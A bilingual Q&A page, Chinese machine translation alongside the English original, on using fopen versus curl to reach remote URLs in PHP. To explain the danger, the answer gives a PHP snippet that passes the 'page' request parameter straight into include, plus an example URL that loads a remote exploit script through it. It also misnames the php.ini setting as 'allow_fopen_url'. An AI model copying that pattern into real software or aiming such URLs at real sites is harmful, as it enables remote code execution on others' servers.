在PHP中使用fopen（$ url）和curl之间的重要区别是什么？ [英] What are the important differences between using fopen($url) and curl in PHP?

问题描述

我正在编写一些代码，需要通过HTTP（s）与web服务通信。在过去，我已经使用curl库。最近，我注意到，我可以简单地使用fopen（）来访问远程URL，看起来简单得多。

Curl看起来更容易配置，选项。除了可配置性，使用哪种方法是否重要？

fopen（）如果是这样，那么更好，为什么？

php.ini 中启用 allow_fopen_url 时打开远程URL。

但是在5.2.0之前的版本，这是非常危险的，因为 include 函数也会下载和解析 PHP代码远程站点。一个天真的编码器可以很容易地找到如下代码：

 <？php 
 $ page = $ _GET [ '页']; 
 include（$ page）; 
？> 
  

攻击者只需要请求 http：// example .com / script.php？page = http：//example.net/my_exploit_script 在系统上执行自己的代码并引入一个漏洞。不幸的是， allow_fopen_url 的默认值是'on'。

幸运的是，从5.2.0开始， 默认为off） allow_url_include ，可防止 include 下载远程代码。

就个人而言，如果你有选择使用Curl，使用而不是 fopen p>

I'm writing some code that will need to speak to a web service over HTTP(s). In the past I've used the curl library. Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.

Curl seems to be much more configurable, having a plethora of options. Beyond that configurability, does it matter which method is used? If so, which is better and why?

解决方案

fopen() will only open remote URLs if allow_fopen_url is enabled in php.ini.

However in versions prior to 5.2.0, this was exceedingly dangerous because the include function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:

<?php
    $page = $_GET['page'];
    include($page);
?>

at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url is 'on'.

Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include which prevents include from downloading remote code.

Personally, if you've got the option to use Curl, use that rather than fopen.

这篇关于在PHP中使用fopen（$ url）和curl之间的重要区别是什么？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！